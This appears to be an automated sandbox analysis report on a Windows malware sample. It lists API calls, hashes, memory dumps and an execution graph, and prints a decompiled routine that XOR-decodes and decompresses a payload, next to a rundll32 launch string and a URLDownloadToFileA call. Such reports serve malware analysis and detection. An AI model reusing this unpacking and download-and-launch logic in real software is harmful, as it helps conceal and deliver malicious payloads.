                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                                  • String ID: Rundll32.exe %s, start
                                                  • API String ID: 130250823-2967502992
                                                  • Opcode ID: 2d77852d958fb0e5b4b89deaaf5be51f9f88daea29ce30dfb51db1c519f10060
                                                  • Instruction ID: d95ae778d5a6352f93819d5a81dc35fc5c6bbfc738c7438807b97f4c21ba852e
                                                  • Opcode Fuzzy Hash: 2d77852d958fb0e5b4b89deaaf5be51f9f88daea29ce30dfb51db1c519f10060
                                                  • Instruction Fuzzy Hash: 97115FFE9001186BD711DB50ED85FE973BCDB54304F008694FA499F141E675FB988B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00357320, Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00357350
                                                  • __isleadbyte_l.LIBCMT ref: 00357384
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,?,00000000,?,?,?), ref: 003573B5
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,?,00000000,?,?,?), ref: 00357423
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: c07013d78dbb74dd6e9c18c6a27453d308fa59d82f4178a70090cd1aeb49fdba
                                                  • Instruction ID: d4ec3607189f4cb9f0754db52ab3f7fa673f64d3032cf7c75034c331321355f2
                                                  • Opcode Fuzzy Hash: c07013d78dbb74dd6e9c18c6a27453d308fa59d82f4178a70090cd1aeb49fdba
                                                  • Instruction Fuzzy Hash: 9E31D235608255EFDB22DF64D884DAD7BB5BF01322F1685A9EC508B1B1E330DD44EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034A870, Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A882
                                                    • Part of subcall function 0034AD8A: __EH_prolog3.LIBCMT ref: 0034AD91
                                                    • Part of subcall function 0034AD8A: std::runtime_error::runtime_error.LIBCPMT ref: 0034ADAE
                                                    • Part of subcall function 0034AD8A: __CxxThrowException@8.LIBCMT ref: 0034ADC3
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A8A5
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A8BC
                                                  • _memcpy_s.LIBCMT ref: 0034A92F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String_base::_Xlenstd::_$Exception@8H_prolog3Throw_memcpy_sstd::runtime_error::runtime_error
                                                  • String ID:
                                                  • API String ID: 1039763836-0
                                                  • Opcode ID: e462159f91ebf12371c075a090d43d788f6f1f0694b4add03d2d06dc5b6c9539
                                                  • Instruction ID: 9a6dd0fc5526aad4b41d023145d117d20ededa83c557e5c25657f8a917b68313
                                                  • Opcode Fuzzy Hash: e462159f91ebf12371c075a090d43d788f6f1f0694b4add03d2d06dc5b6c9539
                                                  • Instruction Fuzzy Hash: 9431E232380F098BD722EE5CD98052AB7E5EFA0710B51492EE192CF641E730FD4587A3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034E3A4, Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0034EA9B: __getptd_noexit.LIBCMT ref: 0034EA9C
                                                    • Part of subcall function 0034EA9B: __amsg_exit.LIBCMT ref: 0034EAA9
                                                  • __amsg_exit.LIBCMT ref: 0034E3D0
                                                  • __lock.LIBCMT ref: 0034E3E0
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0034E3FD
                                                  • InterlockedIncrement.KERNEL32(0036C980), ref: 0034E428
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                  • String ID:
                                                  • API String ID: 2880340415-0
                                                  • Opcode ID: 95f95be24d7f93d605a4ba96fd1a39f2ecb087450f06dd18f2c1e0457a411422
                                                  • Instruction ID: 2cebb276fda5eba3df65a9d790b35ddfe24ad3cfe06abff4fed6e46692b3dc80
                                                  • Opcode Fuzzy Hash: 95f95be24d7f93d605a4ba96fd1a39f2ecb087450f06dd18f2c1e0457a411422
                                                  • Instruction Fuzzy Hash: F901C035D02A21DBCB33AF669849BADB7E0BF00710F069415E810AF691C774BC41CBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034E964, Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0035943C,0036ABD8,0000000C,0034EA76,00000000,00000000,?,?,0034D16F,0034D31B,?,0034BE12,?), ref: 0034E975
                                                  • InterlockedIncrement.KERNEL32(0036C558), ref: 0034E9D0
                                                  • __lock.LIBCMT ref: 0034E9D8
                                                  • ___addlocaleref.LIBCMT ref: 0034E9F7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HandleIncrementInterlockedModule___addlocaleref__lock
                                                  • String ID:
                                                  • API String ID: 2801583907-0
                                                  • Opcode ID: 211c28deb33e55d5fe2efa5ff81b7d27f5811875094f6dfa0529beaa2267e80f
                                                  • Instruction ID: 7ad94ad85fe82f07d604622b17a7e57de51fa235edf76f8df247588cc4870a43
                                                  • Opcode Fuzzy Hash: 211c28deb33e55d5fe2efa5ff81b7d27f5811875094f6dfa0529beaa2267e80f
                                                  • Instruction Fuzzy Hash: 0711C2B0900701DFDB22EF3AD805B9ABBE0FF04301F00841AE899DB2A1C774A904CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00341D40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00341D40(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				void* _v12;
				long _v16;
				char _v20;
				void* _t33;
				void* _t66;
				void* _t67;

				_t1 =  &_a12; // 0x34236a
				_t33 = E00341390( *_t1);
				_t67 = _t66 + 4;
				_v12 = _t33;
				_v8 = 8;
				while(_v8 < _a8) {
					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
					_v8 = _v8 + 1;
				}
				_t19 =  &_v20; // 0x34236a
				_t22 =  &_a12; // 0x34236a
				_v16 = RtlDecompressBuffer(2, _v12,  *_t22, _a4 + 8, _a8 - 8, _t19);
				if(_v16 == 0) {
					_t26 =  &_v20; // 0x34236a
					E00341450(_a4, _v12,  *_t26);
					_t67 = _t67 + 0xc;
				}
				E003413D0(_v12);
				if(_v16 != 0) {
					return 0;
				}
				_t31 =  &_v20; // 0x34236a
				return  *_t31;
			}










                                                  0x00341d46
                                                  0x00341d4a
                                                  0x00341d4f
                                                  0x00341d52
                                                  0x00341d55
                                                  0x00341d67
                                                  0x00341d93
                                                  0x00341d64
                                                  0x00341d64
                                                  0x00341d97
                                                  0x00341da9
                                                  0x00341db9
                                                  0x00341dc0
                                                  0x00341dc2
                                                  0x00341dce
                                                  0x00341dd3
                                                  0x00341dd3
                                                  0x00341dda
                                                  0x00341de6
                                                  0x00000000
                                                  0x00341ded
                                                  0x00341de8
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • RtlDecompressBuffer.NTDLL(00000002,?,j#4,?,004FFFF8,j#4), ref: 00341DB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateBufferDecompressProcess
                                                  • String ID: j#4$j#4
                                                  • API String ID: 2896260840-2453557312
                                                  • Opcode ID: 58f986564c3823682c9c5c20cd8427f55a198f7de81e21b9ecbcfba8b92b393a
                                                  • Instruction ID: 8b572404ecf7dbec48ae8e63a9b8147997b76a483cb6ade8f6efa8f832cfbb9a
                                                  • Opcode Fuzzy Hash: 58f986564c3823682c9c5c20cd8427f55a198f7de81e21b9ecbcfba8b92b393a
                                                  • Instruction Fuzzy Hash: 9D213BB4E04508EFCB05DF98D881ABEBBF9AF89305F148598F9199B241D634BA80CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: svchost.exe PID: 2292 Parent PID: 2364 svchost.exeCOMMON

                                                  Execution Graph

                                                  Execution Coverage:16.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:60%
                                                  Total number of Nodes:943
                                                  Total number of Limit Nodes:71

                                                  Graph

                                                  execution_graph 17155 4013c9 17156 4011c5 17155->17156 17157 40121c SetUnhandledExceptionFilter 17156->17157 17160 40138b 17156->17160 17158 40123d 17157->17158 17158->17160 17161 435e80 17158->17161 17162 435e96 17161->17162 17165 415800 17162->17165 17164 435ebd 17164->17160 17166 415813 17165->17166 17167 4158be CreateMutexA 17166->17167 17168 4158cc 17167->17168 17734 415b31 17168->17734 17743 401d05 17168->17743 17170 415920 17750 422bad 17170->17750 17172 415948 17172->17734 17755 429d4f 17172->17755 17174 415be2 17175 415c31 URLDownloadToFileA 17174->17175 17176 415c5d 17175->17176 17758 429507 17176->17758 17178 415c9f 17761 429728 17178->17761 17180 415cc9 17766 40e85f 17180->17766 17182 415cf1 17806 414ff7 17182->17806 17186 415d54 17825 40e782 17186->17825 17188 414ff7 2 API calls 17194 415e29 17188->17194 17189 411ce0 2 API calls 17189->17194 17190 415ee2 17832 4029b4 17190->17832 17194->17188 17194->17189 17194->17190 17197 415f8c 17198 40695e RtlAllocateHeap 17197->17198 17199 415f9b 17198->17199 17200 40d763 RtlReAllocateHeap RtlAllocateHeap 17199->17200 17435 415fe4 17200->17435 17201 42a801 RtlReAllocateHeap RtlAllocateHeap 17201->17435 17202 4029b4 RtlReAllocateHeap 17203 41856e 17202->17203 17204 402d02 RtlReAllocateHeap 17203->17204 17205 4185a9 17204->17205 17206 40d371 RtlReAllocateHeap RtlAllocateHeap 17205->17206 17207 4185c5 17206->17207 17208 402be8 RtlReAllocateHeap 17207->17208 17209 4185fa 17208->17209 17210 402d02 RtlReAllocateHeap 17209->17210 17212 418630 17210->17212 17211 4028f8 RtlReAllocateHeap 17211->17435 17213 40d371 RtlReAllocateHeap RtlAllocateHeap 17212->17213 17215 418648 17213->17215 17214 404404 RtlReAllocateHeap RtlAllocateHeap 17214->17435 17216 422c53 RtlReAllocateHeap 17215->17216 17215->17734 17217 4186c8 17216->17217 17219 402d02 RtlReAllocateHeap 17217->17219 17218 422c41 RtlReAllocateHeap RtlAllocateHeap 17218->17435 17220 418704 17219->17220 17221 40d371 RtlReAllocateHeap RtlAllocateHeap 17220->17221 17222 41871c 17221->17222 17224 422c53 RtlReAllocateHeap 17222->17224 17222->17734 17223 402be8 RtlReAllocateHeap 17223->17435 17225 418799 17224->17225 17226 402d02 RtlReAllocateHeap 17225->17226 17227 4187d1 17226->17227 17228 40d371 RtlReAllocateHeap RtlAllocateHeap 17227->17228 17229 4187e2 17228->17229 17230 422c53 RtlReAllocateHeap 17229->17230 17229->17734 17231 418865 17230->17231 17232 402d02 RtlReAllocateHeap 17231->17232 17233 41889a 17232->17233 17234 40d371 RtlReAllocateHeap RtlAllocateHeap 17233->17234 17236 4188ad 17234->17236 17235 402956 RtlReAllocateHeap 17235->17435 17237 40695e RtlAllocateHeap 17236->17237 17238 4188be 17237->17238 17239 40d763 RtlReAllocateHeap RtlAllocateHeap 17238->17239 17306 4189d6 17239->17306 17240 4191ba 17241 40695e RtlAllocateHeap 17240->17241 17244 41923a 17241->17244 17242 406693 RtlReAllocateHeap RtlAllocateHeap 17242->17306 17243 40289a RtlReAllocateHeap 17243->17306 17247 422c53 RtlReAllocateHeap 17244->17247 17244->17734 17245 402b8a RtlReAllocateHeap 17245->17435 17246 402371 RtlReAllocateHeap RtlAllocateHeap 17246->17306 17249 4192c3 17247->17249 17248 4290db RtlReAllocateHeap RtlAllocateHeap 17248->17306 17250 402d60 RtlReAllocateHeap 17249->17250 17252 4192ff 17250->17252 17251 402b8a RtlReAllocateHeap 17251->17306 17253 40d371 RtlReAllocateHeap RtlAllocateHeap 17252->17253 17254 419310 17253->17254 17255 415652 RtlReAllocateHeap RtlAllocateHeap 17254->17255 17256 41936f 17255->17256 17257 40653b RtlReAllocateHeap RtlAllocateHeap 17256->17257 17259 41937c 17257->17259 17258 42a801 RtlReAllocateHeap RtlAllocateHeap 17258->17306 17260 40695e RtlAllocateHeap 17259->17260 17261 4193ad 17260->17261 17262 422c53 RtlReAllocateHeap 17261->17262 17261->17734 17263 419436 17262->17263 17264 40283c RtlReAllocateHeap 17263->17264 17265 419476 17264->17265 17266 40d371 RtlReAllocateHeap RtlAllocateHeap 17265->17266 17267 419490 17266->17267 17268 415652 RtlReAllocateHeap RtlAllocateHeap 17267->17268 17269 4194e8 17268->17269 17270 40653b RtlReAllocateHeap RtlAllocateHeap 17269->17270 17272 4194f5 17270->17272 17271 429507 RtlReAllocateHeap RtlAllocateHeap 17271->17306 17274 40695e RtlAllocateHeap 17272->17274 17273 429118 RtlReAllocateHeap RtlAllocateHeap 17273->17435 17275 41952f 17274->17275 17277 402dbe RtlReAllocateHeap 17275->17277 17276 4028f8 RtlReAllocateHeap 17276->17306 17278 41956e 17277->17278 17279 40283c RtlReAllocateHeap 17278->17279 17280 4195a9 17279->17280 17281 40d371 RtlReAllocateHeap RtlAllocateHeap 17280->17281 17282 4195c3 17281->17282 17283 415652 RtlReAllocateHeap RtlAllocateHeap 17282->17283 17284 419624 17283->17284 17285 40653b RtlReAllocateHeap RtlAllocateHeap 17284->17285 17286 419631 17285->17286 17287 40695e RtlAllocateHeap 17286->17287 17289 419669 17287->17289 17288 40714c RtlReAllocateHeap RtlAllocateHeap 17288->17435 17293 422c53 RtlReAllocateHeap 17289->17293 17289->17734 17290 40bab5 RtlReAllocateHeap RtlAllocateHeap 17290->17306 17291 4020ea RtlReAllocateHeap RtlAllocateHeap 17291->17306 17292 40289a RtlReAllocateHeap 17292->17435 17294 419706 17293->17294 17296 40283c RtlReAllocateHeap 17294->17296 17295 40f9c0 RtlReAllocateHeap RtlAllocateHeap 17295->17306 17297 419740 17296->17297 17298 40d371 RtlReAllocateHeap RtlAllocateHeap 17297->17298 17299 419758 17298->17299 17301 415652 RtlReAllocateHeap RtlAllocateHeap 17299->17301 17300 402a70 RtlReAllocateHeap 17300->17306 17302 4197b5 17301->17302 17303 40653b RtlReAllocateHeap RtlAllocateHeap 17302->17303 17304 4197c2 17303->17304 17305 40695e RtlAllocateHeap 17304->17305 17307 4197f4 17305->17307 17306->17240 17306->17242 17306->17243 17306->17246 17306->17248 17306->17251 17306->17258 17306->17271 17306->17276 17306->17290 17306->17291 17306->17295 17306->17300 17306->17734 17308 422c53 RtlReAllocateHeap 17307->17308 17307->17734 17309 41987b 17308->17309 17310 40283c RtlReAllocateHeap 17309->17310 17311 4198bb 17310->17311 17312 40d371 RtlReAllocateHeap RtlAllocateHeap 17311->17312 17313 4198d3 17312->17313 17314 415652 RtlReAllocateHeap RtlAllocateHeap 17313->17314 17315 41992b 17314->17315 17316 40653b RtlReAllocateHeap RtlAllocateHeap 17315->17316 17317 419938 17316->17317 17319 40695e RtlAllocateHeap 17317->17319 17318 4020ea RtlReAllocateHeap RtlAllocateHeap 17318->17435 17320 419963 17319->17320 17321 402b2c RtlReAllocateHeap 17320->17321 17322 419998 17321->17322 17324 40283c RtlReAllocateHeap 17322->17324 17323 418306 17323->17202 17325 4199d3 17324->17325 17326 40d371 RtlReAllocateHeap RtlAllocateHeap 17325->17326 17328 4199ed 17326->17328 17327 4029b4 RtlReAllocateHeap 17327->17435 17329 415652 RtlReAllocateHeap RtlAllocateHeap 17328->17329 17331 419a43 17329->17331 17330 40d3ad RtlReAllocateHeap RtlAllocateHeap 17330->17435 17332 40653b RtlReAllocateHeap RtlAllocateHeap 17331->17332 17333 419a50 17332->17333 17334 40695e RtlAllocateHeap 17333->17334 17335 419a88 17334->17335 17336 402956 RtlReAllocateHeap 17335->17336 17337 419abd 17336->17337 17338 402b8a RtlReAllocateHeap 17337->17338 17339 419afa 17338->17339 17340 40d371 RtlReAllocateHeap RtlAllocateHeap 17339->17340 17341 419b14 17340->17341 17343 415652 RtlReAllocateHeap RtlAllocateHeap 17341->17343 17342 40613b RtlReAllocateHeap RtlAllocateHeap 17342->17435 17345 419b75 17343->17345 17344 4227e3 RtlReAllocateHeap RtlAllocateHeap 17344->17435 17346 40653b RtlReAllocateHeap RtlAllocateHeap 17345->17346 17347 419b82 17346->17347 17348 40695e RtlAllocateHeap 17347->17348 17349 419bb0 17348->17349 17350 422c53 RtlReAllocateHeap 17349->17350 17349->17734 17351 419c43 17350->17351 17352 402b8a RtlReAllocateHeap 17351->17352 17353 419c7f 17352->17353 17354 40d371 RtlReAllocateHeap RtlAllocateHeap 17353->17354 17356 419c97 17354->17356 17355 411df1 RtlAllocateHeap 17355->17435 17357 415652 RtlReAllocateHeap RtlAllocateHeap 17356->17357 17358 419cf4 17357->17358 17359 40653b RtlReAllocateHeap RtlAllocateHeap 17358->17359 17361 419d01 17359->17361 17360 4122dd RtlReAllocateHeap RtlAllocateHeap 17360->17435 17362 40d02f RtlReAllocateHeap RtlAllocateHeap 17361->17362 17368 419d6f 17362->17368 17363 419ee0 17365 40d02f RtlReAllocateHeap RtlAllocateHeap 17363->17365 17364 4202d3 RtlReAllocateHeap RtlAllocateHeap 17364->17435 17366 419f78 17365->17366 17370 422b08 RtlAllocateHeap 17366->17370 17377 41a04e 17366->17377 17367 414d0e RtlReAllocateHeap RtlAllocateHeap 17367->17435 17368->17363 17372 40695e RtlAllocateHeap 17368->17372 17369 4120a6 RtlReAllocateHeap RtlAllocateHeap 17369->17435 17373 41a02b 17370->17373 17371 414c14 RtlReAllocateHeap RtlAllocateHeap 17371->17435 17374 419e03 17372->17374 17381 40d20f RtlReAllocateHeap RtlAllocateHeap 17373->17381 17375 402a70 RtlReAllocateHeap 17374->17375 17378 419e21 17375->17378 17376 414506 RtlReAllocateHeap RtlAllocateHeap 17376->17435 17379 40d02f RtlReAllocateHeap RtlAllocateHeap 17377->17379 17382 40283c RtlReAllocateHeap 17378->17382 17383 41a231 17379->17383 17380 414ff7 RtlReAllocateHeap RtlAllocateHeap 17380->17435 17389 41a045 17381->17389 17384 419e67 17382->17384 17386 40d20f RtlReAllocateHeap RtlAllocateHeap 17383->17386 17397 41a27c 17383->17397 17385 40d371 RtlReAllocateHeap RtlAllocateHeap 17384->17385 17388 419e7a 17385->17388 17387 41a276 17386->17387 17395 402a12 RtlReAllocateHeap 17387->17395 17387->17397 17390 415652 RtlReAllocateHeap RtlAllocateHeap 17388->17390 17389->17377 17394 422c53 RtlReAllocateHeap 17389->17394 17389->17734 17391 419ed3 17390->17391 17393 40653b RtlReAllocateHeap RtlAllocateHeap 17391->17393 17392 429728 RtlReAllocateHeap RtlAllocateHeap 17392->17435 17393->17363 17396 41a13e 17394->17396 17398 41a307 17395->17398 17399 40695e RtlAllocateHeap 17396->17399 17402 406bed RtlAllocateHeap 17397->17402 17414 41a5c5 17397->17414 17397->17734 17400 40695e RtlAllocateHeap 17398->17400 17401 41a149 17399->17401 17404 41a313 17400->17404 17405 40653b RtlReAllocateHeap RtlAllocateHeap 17401->17405 17421 41a418 17402->17421 17403 40b793 RtlReAllocateHeap RtlAllocateHeap 17406 41a688 17403->17406 17407 40653b RtlReAllocateHeap RtlAllocateHeap 17404->17407 17405->17377 17408 41a6cb 17406->17408 17415 41a68f 17406->17415 17407->17397 17409 40239a RtlAllocateHeap 17408->17409 17411 41a6df 17409->17411 17410 406255 RtlReAllocateHeap RtlAllocateHeap 17410->17435 17412 411ce0 RtlReAllocateHeap RtlAllocateHeap 17411->17412 17419 41a6c9 17411->17419 17412->17419 17413 414ff7 RtlReAllocateHeap RtlAllocateHeap 17413->17415 17414->17403 17415->17411 17415->17413 17417 414eed RtlReAllocateHeap RtlAllocateHeap 17415->17417 17415->17419 17416 411c63 RtlReAllocateHeap RtlAllocateHeap 17416->17435 17417->17415 17418 411ce0 RtlReAllocateHeap RtlAllocateHeap 17418->17435 17420 40d763 RtlReAllocateHeap RtlAllocateHeap 17419->17420 17422 41a78a 17420->17422 17421->17414 17424 4228b7 RtlReAllocateHeap RtlAllocateHeap 17421->17424 17421->17734 17423 401db5 RtlReAllocateHeap RtlAllocateHeap 17422->17423 17425 41a7b6 17423->17425 17424->17421 17426 406207 RtlAllocateHeap 17425->17426 17429 41a908 17425->17429 17432 41a7f6 17426->17432 17427 406380 RtlReAllocateHeap RtlAllocateHeap 17427->17435 17428 401db5 RtlReAllocateHeap RtlAllocateHeap 17428->17432 17430 414eed RtlReAllocateHeap RtlAllocateHeap 17429->17430 17431 41a9b5 17430->17431 17433 411ce0 RtlReAllocateHeap RtlAllocateHeap 17431->17433 17436 41a9bc 17431->17436 17432->17428 17432->17429 17434 4066d2 RtlReAllocateHeap RtlAllocateHeap 17432->17434 17433->17436 17434->17432 17435->17201 17435->17211 17435->17214 17435->17218 17435->17223 17435->17235 17435->17245 17435->17273 17435->17288 17435->17292 17435->17318 17435->17323 17435->17327 17435->17330 17435->17342 17435->17344 17435->17355 17435->17360 17435->17364 17435->17367 17435->17369 17435->17371 17435->17376 17435->17380 17435->17392 17435->17410 17435->17416 17435->17418 17435->17427 17438 406452 RtlReAllocateHeap RtlAllocateHeap 17435->17438 17435->17734 17437 422c53 RtlReAllocateHeap 17436->17437 17436->17734 17448 41aadc 17437->17448 17438->17435 17439 41ad08 17440 40239a RtlAllocateHeap 17439->17440 17441 41acfc 17440->17441 17442 414ff7 RtlReAllocateHeap RtlAllocateHeap 17441->17442 17443 41ad77 17442->17443 17444 414d0e RtlReAllocateHeap RtlAllocateHeap 17443->17444 17453 41adc6 17443->17453 17445 41ad8e 17444->17445 17446 414ded RtlReAllocateHeap RtlAllocateHeap 17445->17446 17445->17453 17447 41ada5 17446->17447 17449 414c14 RtlReAllocateHeap RtlAllocateHeap 17447->17449 17447->17453 17448->17439 17474 41acbb 17448->17474 17450 41adbe 17449->17450 17451 411ce0 RtlReAllocateHeap RtlAllocateHeap 17450->17451 17450->17453 17451->17453 17452 425b74 RtlReAllocateHeap RtlAllocateHeap 17452->17453 17453->17452 17454 41af60 17453->17454 17457 41afe2 17453->17457 17455 426a00 RtlReAllocateHeap RtlAllocateHeap 17454->17455 17456 41af80 17455->17456 17459 4290db RtlReAllocateHeap RtlAllocateHeap 17456->17459 17458 4290db RtlReAllocateHeap RtlAllocateHeap 17457->17458 17460 41afc1 17458->17460 17459->17460 17462 422b08 RtlAllocateHeap 17460->17462 17461 401d05 RtlReAllocateHeap RtlAllocateHeap 17461->17474 17464 41b0d6 17462->17464 17463 42d078 RtlReAllocateHeap RtlAllocateHeap 17463->17474 17465 4227e3 RtlReAllocateHeap RtlAllocateHeap 17464->17465 17466 41b0f1 17465->17466 17468 41b164 17466->17468 17469 41b12c 17466->17469 17495 41b373 17466->17495 17467 40634f RtlReAllocateHeap RtlAllocateHeap 17467->17474 17471 428215 RtlAllocateHeap 17468->17471 17470 42ce49 RtlReAllocateHeap RtlAllocateHeap 17469->17470 17472 41b142 17470->17472 17473 41b175 17471->17473 17479 42d0aa RtlReAllocateHeap RtlAllocateHeap 17472->17479 17490 41b1e5 17472->17490 17475 425b31 RtlReAllocateHeap RtlAllocateHeap 17473->17475 17474->17441 17474->17461 17474->17463 17474->17467 17476 41b188 17475->17476 17478 42d043 RtlReAllocateHeap 17476->17478 17477 40e782 RtlReAllocateHeap RtlAllocateHeap 17480 41b3fd 17477->17480 17481 41b190 17478->17481 17479->17481 17485 422b08 RtlAllocateHeap 17480->17485 17483 42d078 RtlReAllocateHeap RtlAllocateHeap 17481->17483 17482 422a8d RtlReAllocateHeap RtlAllocateHeap 17489 41b25e 17482->17489 17484 41b1d4 17483->17484 17486 422c41 RtlReAllocateHeap RtlAllocateHeap 17484->17486 17487 41b470 17485->17487 17486->17490 17488 4227e3 RtlReAllocateHeap RtlAllocateHeap 17487->17488 17492 41b484 17488->17492 17491 422b08 RtlAllocateHeap 17489->17491 17490->17482 17493 41b35f 17491->17493 17496 40e782 RtlReAllocateHeap RtlAllocateHeap 17492->17496 17494 4227e3 RtlReAllocateHeap RtlAllocateHeap 17493->17494 17494->17495 17495->17477 17497 41b4ec 17496->17497 17498 422a8d RtlReAllocateHeap RtlAllocateHeap 17497->17498 17499 41b53f 17498->17499 17500 422b08 RtlAllocateHeap 17499->17500 17501 41b5b0 17500->17501 17502 4227e3 RtlReAllocateHeap RtlAllocateHeap 17501->17502 17503 41b5d0 17502->17503 17504 422b08 RtlAllocateHeap 17503->17504 17505 41b6b6 17504->17505 17506 4227e3 RtlReAllocateHeap RtlAllocateHeap 17505->17506 17507 41b6ca 17506->17507 17508 422b08 RtlAllocateHeap 17507->17508 17509 41b769 17508->17509 17510 4227e3 RtlReAllocateHeap RtlAllocateHeap 17509->17510 17513 41b77d 17510->17513 17511 41b877 17512 422a8d RtlReAllocateHeap RtlAllocateHeap 17511->17512 17527 41b8a0 17512->17527 17513->17511 17514 422b08 RtlAllocateHeap 17513->17514 17515 41b863 17514->17515 17517 4227e3 RtlReAllocateHeap RtlAllocateHeap 17515->17517 17516 41b950 17518 422b08 RtlAllocateHeap 17516->17518 17517->17511 17519 41ba10 17518->17519 17521 4227e3 RtlReAllocateHeap RtlAllocateHeap 17519->17521 17520 401d05 RtlReAllocateHeap RtlAllocateHeap 17520->17527 17524 41ba24 17521->17524 17522 42d078 RtlReAllocateHeap RtlAllocateHeap 17522->17527 17523 422c41 RtlReAllocateHeap RtlAllocateHeap 17523->17527 17525 41bab2 17524->17525 17526 41ba45 17524->17526 17529 422a8d RtlReAllocateHeap RtlAllocateHeap 17525->17529 17528 422b08 RtlAllocateHeap 17526->17528 17527->17516 17527->17520 17527->17522 17527->17523 17530 41ba99 17528->17530 17529->17530 17531 422b08 RtlAllocateHeap 17530->17531 17532 41bbb9 17531->17532 17533 4227e3 RtlReAllocateHeap RtlAllocateHeap 17532->17533 17534 41bbcd 17533->17534 17535 401d05 RtlReAllocateHeap RtlAllocateHeap 17534->17535 17536 41bc13 17535->17536 17537 42d078 RtlReAllocateHeap RtlAllocateHeap 17536->17537 17538 41bc36 17537->17538 17539 422c41 RtlReAllocateHeap RtlAllocateHeap 17538->17539 17540 41bc40 17539->17540 17541 422b08 RtlAllocateHeap 17540->17541 17542 41bcb5 17541->17542 17543 4227e3 RtlReAllocateHeap RtlAllocateHeap 17542->17543 17544 41bce2 17543->17544 17545 4227e3 RtlReAllocateHeap RtlAllocateHeap 17544->17545 17559 41bd2c 17545->17559 17546 41be4e 17547 40e782 RtlReAllocateHeap RtlAllocateHeap 17546->17547 17549 41bec8 17547->17549 17548 401d05 RtlReAllocateHeap RtlAllocateHeap 17548->17559 17551 422b08 RtlAllocateHeap 17549->17551 17550 42d078 RtlReAllocateHeap RtlAllocateHeap 17550->17559 17552 41bf7a 17551->17552 17554 4227e3 RtlReAllocateHeap RtlAllocateHeap 17552->17554 17553 422c41 RtlReAllocateHeap RtlAllocateHeap 17553->17559 17555 41bf8e 17554->17555 17558 4227e3 RtlReAllocateHeap RtlAllocateHeap 17555->17558 17556 422b08 RtlAllocateHeap 17556->17559 17557 4227e3 RtlReAllocateHeap 